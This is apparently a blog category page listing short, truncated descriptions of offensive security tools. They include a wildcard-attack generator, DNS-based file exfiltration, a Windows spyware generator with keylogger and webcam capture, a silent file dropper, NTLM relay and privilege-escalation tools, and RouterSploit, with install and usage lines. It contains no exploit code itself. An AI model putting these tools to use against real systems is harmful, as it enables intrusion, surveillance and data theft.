Browsing category
Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks. It’s considered a fairly old-skool attack vector, but it still works quite often. Wildpwn Usage It goes something like this: usage: wildpwn.py [-h] [–file FILE] payload folder Tool to generate unix wildcard attacks positional arguments payload Payload to use: (combined | tar […]
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine’s IP address and to serve attack payloads to exploit vulnerable software on the target machine. It also ships with sample payloads to exploit several vulnerable software versions, […]
ExchangeRelayX is a PoC tools to demonstrate the ability of an attacker to perform an SMB or HTTP based NTLM relay attack to the EWS endpoint on an on-premise Microsoft Exchange server to compromise the mailbox of the victim. This tool provides the attacker with an OWA looking interface, with access to the user’s mailbox […]
It’s designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming. This is a work-in-progress as I have free time, so please bear with me. Installation Get the code from this github: git clone https://github.com/its-a-feature/Apfell Install and setup the requirements (Note: The Sanic webserver […]
REXT is a toolkit for easy creation and usage of various python scripts that work with embedded devices. Requirements: requests paramiko beautifulsoup4 Installation: Git clone REXT repository (this is the recommended way if you wish for REXT update command to work) $ git clone https://github.com/j91321/rext.git or download REXT $ wget https://github.com/j91321/rext/archive/master.zip $ unzip master.zip Install […]
DNSteal is a python based tool that allows you to stealthily extract files from a victim machine through DNS requests. Features: Support for multiple files Gzip compression supported Supports the customization of subdomains and bytes per subdomain and the length of the filename. Usage: Usage: python dnsteal.py [listen_address] [options] Options: -z Unzip incoming files. -v […]
RDPY is an RDP Security Tool in Twisted Python with RDP Man in the Middle proxy support which can record sessions and Honeypot functionality. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard […]
Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes “copysploit” to copy any exploit-db exploit to the current directory and “compilesploit” to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c). For updates to this script, type findsploit update […]
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. Requirements gnureadline requests paramiko beautifulsoup4 Installation sudo apt-get install python-requests python-paramiko python-netsnmp git clone https://github.com/reverse-shell/routersploit ./rsf.py RouterSploit consists of various modules that aids penetration testing operations: exploits modules that take advantage of identified vulnerabilities RouterSploit currently supports limited number of exploits out […]
s)AINT is a Spyware Generator for Windows systems written in Java. Features Keylogger Take Screenshot Webcam Capture Persistence Tested OnKali Linux – ROLLING EDITION How To Use # Install dependencies (you need Maven and JDK 8 package installed) $ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y # To generate a .EXE using launch4j are […]
Mr.SIP is a tool developed to audit and simulate SIP-based attacks. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and defense approaches and then as an idea to convert it to a fully functional SIP-based penetration testing tool, it has been redeveloped into the current version. […]
Evil Foca is an open source tool that you can use to test IPv4 and IPv6 data network security. Note: Evil Foca requires WinPcap libraries and .NET Framework (4 or later). So, install both before running Evil Foca on your computer. It can carry out various kinds of attacks, such as: MITM over IPv4 networks with […]
PRET is a new tool for printer security testing developed in the scope of a Master’s Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language.Currently PostScript, PJL and PCL are supported which are spoken by most laser printers. This allows cool […]
Umbrella is a file dropper dedicated to pentesting, it downloads a file on target system and then executes without the need of double execution. To compromise the same target again, you need to delete the following folder on target system : – C:UsersPublicLibrariesIntel Features Download executable on target system. Silent execution. If the exe already […]
Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Included In p0wnedShell – https://github.com/Cn33liz/p0wnedShell PowerShell Empire – https://github.com/PowerShellEmpire/Empire PS>Attack – https://github.com/jaredhaight/psattack How it works Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS […]
This is a python tool with a collection of IT security software. The software is incapsulated in “modules”. The modules does consist of pure python code and/or external third programs. Main functions 1) To use a module, run the command “use [module_call]”, e.g. “use apsniff”, to activate the module. 2) The modules options can be […]
A DNS proxy server built to be deployed in place of a compromised nameserver to perform targeted exploitation. Judas works by proxying all DNS queries to the legitimate nameservers for a domain. The magic comes with Judas’s rule configurations which allow you to change DNS responses depending on source IP or DNS query type. This […]
Deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language. Installation $ git clone https://github.com/codepr/creak.git $ cd creak $ python setup.py install or simply clone the […]
CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments! From enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more! The biggest improvements over the above tools are: Pure Python script, no external tools required Fully concurrent threading Uses ONLY native […]
A tool that transforms Firefox Browsers into a penetration testing suite How ? It downloads the most important extensions, and install it on your browser. The used extensions has been chosen by a survey among the information security community. Based on it’s results, Firefox Security Toolkit was made. Also, it allows you to download Burp […]
CJExploiter is drag and drop ClickJacking exploit development assistance tool. First open the “index.html” with your browser locally and enter target URL and click on “View Site”. You can dynamically create your own inputs. Finally by click the “Exploit It” you can see the P0C. Summary Clickjacking, also known as a “UI redress attack”, is […]